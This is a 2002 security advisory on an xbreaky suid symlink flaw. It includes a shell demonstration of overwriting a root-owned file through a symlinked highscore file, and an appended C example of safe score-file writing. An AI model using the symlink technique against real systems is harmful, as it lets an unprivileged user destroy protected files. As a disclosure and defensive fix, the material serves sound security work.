From: Marco van Berkum (m.v.berkum_at_obit.nl)
Date: Thu Sep 12 2002 - 11:28:14 CDT


    Title: xbreaky symlink vulnerability
    Author: Marco van Berkum
    Classification: High risk
    Date: 12/09/2002
    Email: m.v.berkum@obit.nl
    Company: OBIT
    Company site: http://www.obit.nl
    Personal website: http://ws.obit.nl

    About xbreaky
    xbreaky is a breakout game for X written by Dave Brul, which can be downloaded
    from http://xbreaky.sourceforge.net. xbreaky has been added to the OpenBSD
    ports tree, the NetBSD tree and possibly others.

    By default xbreaky is installed as suid and can be abused to overwrite any file
    on the filesystem, by any user.

    Vulnerable versions
    All versions prior to 0.0.5

    xbreaky writes its highscores to $HOME/.breakyhighscores. When
    $HOME/.breakyhighscores is a symlink to another file (*any* file), xbreaky
    simply overwrites that file as the root user.

    root@animal:/home/marco# echo "bla" >rootfile
    root@animal:/home/marco# chmod 600 rootfile
    root@animal:/home/marco# exit
    marco@animal:~$ ln -s rootfile .breakyhighscores
    marco@animal:~$ xbreaky

    Now I play a game and set highscore as user "lol", then I exit the game.
    It's a nice game btw :)

    marco@animal:~$ cat rootfile
    cat: rootfile: Permission denied
    marco@animal:~$ su -
    root@animal:~# cat /home/marco/rootfile
    lol <- voila, our highscore user

    Author's response and solution
    The author corrected the problem and released xbreaky 0.0.5

    Thanks to Dennis Oelkers for testing.

    find / -user your -name base -exec chown us:us {}\;
    |    Marco van Berkum / MB17300-RIPE     |
    | m.v.berkum@obit.nl / http://ws.obit.nl |
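
The advisory does not say how xbreaky 0.0.5 fixed the problem. The C code below is an added example, not xbreaky's code, of one common way for a suid program to write a per-user file such as $HOME/.breakyhighscores: drop to the invoking user's uid, refuse a symlink with O_NOFOLLOW, and check the opened file before truncating it. The names save_scores and symlink_is_refused and the /tmp paths are hypothetical, and group privileges are assumed not to matter.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write data to the score file using the invoking user's rights only.
 * Returns 0 on success, -1 if the path is refused or a call fails. */
int save_scores(const char *path, const char *data)
{
    struct stat st;
    uid_t priv = geteuid();
    size_t len = strlen(data);
    int rc = -1;
    if (seteuid(getuid()) != 0) return -1;   /* act as the real user, not root */
    /* O_NOFOLLOW: open() fails with ELOOP if the last component is a symlink.
     * No O_TRUNC: nothing is destroyed before the fstat() checks pass. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd >= 0) {
        if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_nlink == 1 &&
            st.st_uid == getuid() && ftruncate(fd, 0) == 0 &&
            write(fd, data, len) == (ssize_t)len)
            rc = 0;
        close(fd);
    }
    if (seteuid(priv) != 0) rc = -1;         /* could not regain the saved euid */
    return rc;
}

/* Constructed scenario mirroring the advisory: returns 1 when a symlinked
 * score file is refused and its target still contains "bla\n". */
int symlink_is_refused(void)
{
    char dir[] = "/tmp/scoresXXXXXX", target[64], lnk[64], buf[8] = {0};
    FILE *f;
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/rootfile", dir);
    snprintf(lnk, sizeof lnk, "%s/.breakyhighscores", dir);
    if (!(f = fopen(target, "w"))) return 0;
    fputs("bla\n", f); fclose(f);
    if (symlink(target, lnk) != 0) return 0;
    int refused = save_scores(lnk, "lol\n") == -1;
    if (!(f = fopen(target, "r"))) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f); fclose(f);
    return refused && n == 4 && memcmp(buf, "bla\n", 4) == 0;
}

int main(void) { printf("symlink refused: %d\n", symlink_is_refused()); return 0; }
```

In the constructed scenario the target file belongs to the same user, so the refusal comes from O_NOFOLLOW alone; with a root-owned 0600 target as in the advisory, the dropped euid would also make the open fail.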